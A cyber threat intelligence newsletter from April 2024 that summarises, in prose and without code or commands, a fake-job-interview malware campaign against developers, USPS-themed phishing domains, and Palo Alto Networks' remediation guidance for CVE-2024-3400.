United States: Ankura CTIX FLASH Update - April 30, 2024

Ransomware/Malware Activity

Job-Seeking Software Developers Deceived into Downloading a Python Backdoor

Researchers are following a social engineering-based malware campaign designed to deceive job-seeking software developers into downloading a malicious python backdoor as part of a fake interview process. The campaign is called "DEV#POPPER" and researchers have speculated that North Korea may be behind its operation. The attackers are known to make initial contact with prospective employees by posing as hiring managers looking to fill a developer role. As part of the interview process, candidates are asked to download a coding task from a GitHub repository, purportedly as a test of technical aptitude. The zip file hosted on GitHub and downloaded by the victim contains an NPM (node package manager) package along with a README.md file. When the NPM package is run, an obfuscated JavaScript file runs a curl command that downloads an archive file which itself is an obfuscated python script. The obfuscated python script is a remote access tool (RAT) with mechanisms for persistence, command execution, FTP data exfiltration, and keystrokes logging. This campaign is being waged on the heels of a similar campaign dubbed "Contagious Interview" during which attackers similarly posed as employers to coerce job-seeking developers into installing BeaverTail and InvisibleFerret malware. Both campaigns seem to target software developers specifically. DEV#POPPER has been linked to North Korea due to the social engineering technique of targeting job-seekers, which the Lazarus Group has been notorious for using in its campaigns. CTIX analysts caution those currently looking for new jobs to do proper due diligence on prospective companies prior to entering the interview process. CTIX analysts will continue to report on new and emerging malware and associated campaigns.

• Bleeping Computer: Dev#Popper Article
• The Hacker News: Dev#Popper Article

Threat Actor Activity

Phishing Campaigns Targeting USPS Have Alarming Success Rates

A recent discovery has found an alarming rate of traffic to domains associated with phishing campaigns targeting the United States Postal Service (USPS), revealing that traffic to fraudulent domains often rivals or surpasses that of the legitimate USPS website, most notably during the holiday season. Initiated by an investigation into suspicious SMS messages, researchers uncovered a significant number of "combosquatting" domains designed to mimic the official USPS site, deceiving users into downloading malware, sharing sensitive information, or mostly making payments to fraudulent entities for what's often advertised as a "redelivery" fee. The findings from October 2023 to February 2024 indicate a sophisticated and wide-reaching effort by cybercriminals to exploit the USPS brand, with malicious traffic peaking during the November to December holiday season. This underscores the broader risk of combosquatting campaigns that potentially target multiple brands beyond USPS. The fake sites used in these campaigns leveraged convincing replicas of USPS's website and package tracking system, with one of the malicious domains having attracted nearly half a million queries, and multiple others surpassing 150,000. CTIX analysts encourage consumers to exercise caution and skepticism towards unsolicited communications about package shipments. To avoid falling victim to these phishing attempts, it's recommended to directly access the official USPS website for any parcel tracking needs rather than clicking on links provided in messages, thereby safeguarding personal and financial information from cybercriminal activities. The USPS also has a page on their website related to these phishing campaigns for how to report potential fraud and prevent being scammed. A link can be found below.

• The Record: USPS Article
• Bleeping Computer: USPS Article
• USPIS/USPS: Phishing Alert

Vulnerabilities

Palo Alto Networks Issues Tiered Remediation Techniques for Mitigating a Recently Patched Critical Vulnerability

Palo Alto Networks has issued remediation guidance for a critical security vulnerability in PAN-OS, which has been actively exploited since at least March 26, 2024. The flaw, tracked as CVE-2024-3400 (CVSS score of 10/10), allows for unauthenticated remote shell command execution on affected devices and has been patched in various versions of PAN-OS. Named Operation MidnightEclipse, the exploitation involves deploying a Python-based backdoor, UPSTYLE, which executes commands from specially crafted requests. Although no specific threat actor has been linked, the sophistication suggests a state-backed group. Palo Alto Networks outlines remediation steps for various levels of compromise. At Level 0, an unsuccessful attempt prompts a hotfix update. Level 1, where vulnerability testing is evident without harmful commands, also requires a hotfix update. For Level 2, where potential data exfiltration such as unauthorized copying of configuration files is detected, a hotfix update and a Private Data Reset are necessary. At Level 3, which shows interactive malicious activities, both a hotfix update and a Factory Reset are advised. CTIX analysts urge any administrators to ensure they have followed the guidance in the advisory linked below to prevent future exploitation.

• The Hacker News: CVE-2024-3400 Article
• Palo Alto Networks: CVE-2024-3400 Advisory

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.